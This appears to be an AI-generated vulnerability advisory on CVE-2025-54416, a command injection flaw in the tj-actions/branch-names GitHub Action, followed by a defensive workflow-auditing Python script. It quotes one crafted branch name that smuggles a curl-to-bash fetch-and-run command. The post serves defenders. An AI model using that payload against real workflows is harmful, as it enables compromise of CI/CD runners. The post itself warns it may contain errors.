Summary of CVE-2025-54416: Command Injection in tj-actions/branch-names GitHub Action

This post provides a brief summary of CVE-2025-54416, a critical command injection vulnerability in versions 8.2.1 and below of the tj-actions/branch-names GitHub Action. The flaw allows arbitrary command execution via unsanitized branch or tag names. Patch details and technical exploitation information are included.

ZeroPath CVE Analysis


2025-07-25

Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.


Introduction

A single malicious branch name can compromise an entire CI/CD pipeline if it is not properly sanitized. That is exactly what happened with tj-actions/branch-names, a popular GitHub Action used to extract branch and tag names in automated workflows. This vulnerability, tracked as CVE-2025-54416, enables arbitrary command execution in any workflow that consumes the output of versions 8.2.1 and below. With a CVSS score of 9.1, the risk is significant for any project relying on this action in collaborative or open environments.

About tj-actions/branch-names:

tj-actions is a GitHub organization that maintains a suite of workflow automation tools for GitHub Actions. The branch-names action is widely used in open-source and enterprise CI/CD pipelines to programmatically retrieve branch and tag names across all GitHub event types. Its popularity stems from its flexibility and ease of integration, making it a common dependency in many DevOps workflows.

Technical Information

CVE-2025-54416 is a command injection vulnerability resulting from improper input sanitization and unescaped output in the tj-actions/branch-names GitHub Action. The flaw occurs when branch or tag names containing shell metacharacters are not properly neutralized before being passed to downstream workflow steps. Attackers can exploit this by crafting branch or tag names that inject arbitrary shell commands into the workflow execution context.

The vulnerability specifically affects how the action exposes branch and tag names via its outputs. If a workflow step uses these outputs directly in a shell command, a maliciously crafted branch name can break out of the expected context and execute arbitrary commands. For example, a branch name such as:

"test") ${IFS} && {curl -sSfL gist.githubusercontent.com/[MALICIOUS-CONTENT].sh } | bash && echo "foo"

When this branch name is processed by the vulnerable action and used in a shell context, the injected commands are executed with the permissions of the workflow runner. The root cause is the lack of proper escaping and sanitization of user-controlled input, which is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command). The issue was addressed in version 9.0.0, which implements stricter output escaping and input validation.
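As an added illustration that is not part of this analysis or of the tj-actions project, the script below places the vulnerable workflow pattern (a branch-names output expanded by `${{ }}` straight into a `run:` script) beside the hardened one (the value passed through an environment variable and referenced as quoted shell data), and flags the former. The step id and the `current_branch` output name are assumptions chosen for illustration, and the check is a line-based heuristic rather than a YAML parser.

```python
"""Heuristic audit for the CVE-2025-54416 pattern: a `run:` script that embeds a
tj-actions/branch-names output via ${{ }}. Line-based, not a full YAML parser."""
import re

# Constructed samples; the step id and the output name `current_branch` are
# illustrative assumptions, not taken from the advisory.
VULNERABLE = """\
steps:
  - id: branch-names
    uses: tj-actions/branch-names@v8
  - name: Vulnerable - expression is pasted into the script text
    run: |
      echo "Building branch ${{ steps.branch-names.outputs.current_branch }}"
"""
HARDENED = """\
steps:
  - id: branch-names
    uses: tj-actions/branch-names@v9
  - name: Hardened - value reaches the shell as data, never as script text
    env:
      BRANCH: ${{ steps.branch-names.outputs.current_branch }}
    run: echo "Building branch $BRANCH"
"""
EXPR = re.compile(r"\$\{\{\s*steps\.([\w-]+)\.outputs\.[\w-]+\s*\}\}")

def branch_name_steps(workflow: str) -> set[str]:
    """Ids of steps whose `uses:` is tj-actions/branch-names."""
    ids = set()
    for item in re.split(r"\n(?=\s*-\s)", workflow):  # one list item per chunk
        step_id = re.search(r"^\s*-?\s*id:\s*([\w-]+)", item, re.M)
        uses = re.search(r"^\s*-?\s*uses:\s*tj-actions/branch-names\b", item, re.M)
        if step_id and uses:
            ids.add(step_id.group(1))
    return ids

def unsafe_run_lines(workflow: str) -> list[str]:
    """Script lines that interpolate a branch-names output directly into run:."""
    ids = branch_name_steps(workflow)
    findings, run_indent = [], None
    for line in workflow.splitlines():
        indent = len(line) - len(line.lstrip())
        key = re.match(r"^\s*-?\s*run:(.*)$", line)
        if key:                                        # start of a run: script
            run_indent, body = indent, key.group(1)
        elif run_indent is not None and indent > run_indent:
            body = line                                # block-scalar continuation
        else:
            run_indent = None                          # sibling key such as env:
            continue
        if any(m.group(1) in ids for m in EXPR.finditer(body)):
            findings.append(line.strip())
    return findings
```

The hardened form works because the expression is evaluated into an environment variable before the shell starts, so the branch name never becomes part of the script text the shell parses.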

Affected Systems and Versions

The vulnerability affects tj-actions/branch-names versions 8.2.1 and below. Any workflow that uses these versions and consumes branch or tag names as shell variables or command arguments is at risk, especially in repositories that accept contributions from untrusted users or external collaborators. The issue is fixed in version 9.0.0 and later.

Vendor Security History

tj-actions has responded to this vulnerability by releasing a fix in version 9.0.0 and publishing a detailed security advisory. No prior similar vulnerabilities were found in the public record for this action. The vendor's patch response was prompt following disclosure.
